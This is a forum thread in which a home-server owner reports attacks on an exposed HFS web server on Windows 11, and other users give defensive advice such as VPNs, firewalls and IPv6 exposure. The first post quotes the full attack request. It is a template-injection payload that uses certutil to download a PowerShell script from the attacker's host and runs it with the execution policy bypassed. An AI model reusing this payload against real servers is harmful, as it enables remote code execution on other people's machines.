Attack on my Home Server

[arup]

I've been running a home server (OS- Win11 23H2) for accessing as tally licence server as well as some storage. It has a static IP.
Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.
Today when I logged into it, there was a long list of windows defender blocked threat.

I checked for the source and found that it comes from the port 80 open in HFS.

103.87.240.114:36368 Requested GET /?n=> &cmd=cmd /c certutil -url""""cache -split -f http://103.87.240.114:8084/download "logs1.ps1" && powershell -ExecutionPolicy Bypass -File "logs1.ps1"&search=%xxx%url%:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}

I was unaware that a simple HTTP host can be triggered externally to execute commands.

The WHOIS of the malicious IP dirtects to Hong Kong.

I've executed a full system scan through windows defender and didn't find any threats.
I've turned on the HTTP server again, and again I face incoming traffic from that IP address.

I've banned the IP address , but the attacker might use another IP for the same as well.

Is there any option for blocking cmd lines from execution if it's pushed by browser requests like this to a HTTP server.

I've banned the IP address , but the attacker might use another IP for the same as well.

It's indeed true. Now I'm getting malicious traffic from

125.229.247.222
95.214.55.138

Right Now , I've turned off the HTTP server completely unless I find a solution.

 

[bobbyprajan]

If the access is limited to few, you should consider using a VPN for accessing these resources

 

[badwhitevision]

Fail2Ban on linux comes to mind.

Search for the same or an equivalent on Windows.

As a future PSA to all,

Always remember, open ports being attacked is a matter of when, not if.

 

[tearphones]

I have a server on cloud, and it is constantly being scanned and tested, most frequently by scripts looking for wordpress / php vulnerabilities. Whatever server you're using: keep it up to date. Make sure the update is automatic, don't wait for human input for it to be updated. That should suffice.

When your server got the malicious request, what did it do? Did it actually execute the payload? That would be a major flaw in the server software. You should find a different server, if it is not yet patched (for example, you can set up nginx to reverse proxy requests to your server of choice, and you can set it up so that nginx only forwards URL patterns you recognize)

EDIT: As @bobbyprajan said above, if this is scary, remove the open port and switch to a VPN solution (like tailscale, which is free for personal use)

 

[superczar]

A lot of folks seem to be suggesting that closing ports on router is a solution..
However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Unfortunately majority of consumer routers do not have any kind of firewall - which was OK with ipv4 due to the router NAT so you got security as a side effect of NATing from a single public ip.
No longer true though

Earlier scans and attacks were prevalent only on ipv4 but IPv6 scans and attacks are getting increasingly common now.

 

[arup]

When your server got the malicious request, what did it do? Did it actually execute the payload?

Server actually processes the request and tries to execute the malicious code through command prompt (cmd) and at the time of attack, server stops responding for a few seconds until the malicious code is eventually blocked by windows defender, thereafter server acts normal till the next attack.

 

[tearphones]

Server actually processes the request and tries to execute the malicious code through command prompt (cmd) and at the time of attack, server stops responding for a few seconds until the malicious code is eventually blocked by windows defender, thereafter server acts normal till the next attack.

I think this is very serious. You should not be using / exposing a server that acts on external requests in this way.

EDIT: Clarifying
- if the request is anonymous, a server may respond to read-only requests for public data
- if the request is authenticated, only then a server can try to do other things, like executing code or mutating state
You should figure out how to restrict calls to authenticated users only ASAP

 

[Party Monger]

A lot of folks seem to be suggesting that closing ports on router is a solution..
However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Unfortunately majority of consumer routers do not have any kind of firewall - which was OK with ipv4 due to the router NAT so you got security as a side effect of NATing from a single public ip.
No longer true though

Earlier scans and attacks were prevalent only on ipv4 but IPv6 scans and attacks are getting increasingly common now.

Whats the solution then?

 

[superczar]

Whats the solution then?

Ideally a firewall that can handle ipv6.

I have been on opnsense as my primary router for a while now so no impact due to ipv6 transition.. so that is one option

Because of the above, i havent really explored if any of the newer consumer routers come with a firewall - but that could be option two

 

[lockhrt999]

However Unless you are on a local ISP, all your devices anyway are fully exposed to the Internet with fully addressable ipv6 public addresses.

Is there an easy way to check this? Have big ISPs started using IPv6?

 

[vishalrao]

Anything was not encrypted till now and anyone can access if they know the IP (I don't tell anyone the IP.

ummm, isnt this the reason for being attacked? "anyone can access if they know the IP" - i mean , there are plenty of botnets continually scanning public IPs for known services/login and here you've left it "not encrypted" meaning I guess no login page or something like that?

 

[burntwingzZz]

its time to virtualize your server install pfsense and connect the server behind pfsense

 

[superczar]

Is there an easy way to check this? Have big ISPs started using IPv6?

The big 3 definitely are .. Small/ Local ISPs may/may not be

Easy enough to check .. just see the dhcp addresses on any ipv6 client and i f you have been allocated a public ipv6 address

 

[YeAhx]

The big 3 definitely are .. Small/ Local ISPs may/may not be

Easy enough to check .. just see the dhcp addresses on any ipv6 client and i f you have been allocated a public ipv6 address

Off-topic but which big 3 may I ask?

 

[rsaeon]

Anything was not encrypted till now and anyone can access if they know the IP

Wait, you had... a windows machine exposed to the internet... DIRECTLY?! That should never be done. It's never safe. Exposing services through a static ip has never been a good idea, not even twenty years ago when everyone had their own private FTP server running on their desktop.

Set up Tailscale, or Wireguard. Use that and only that to connect two private networks across the internet. They're both free.

 

[superczar]

Airtel, jio, tata

Off-topic but which big 3 may I ask?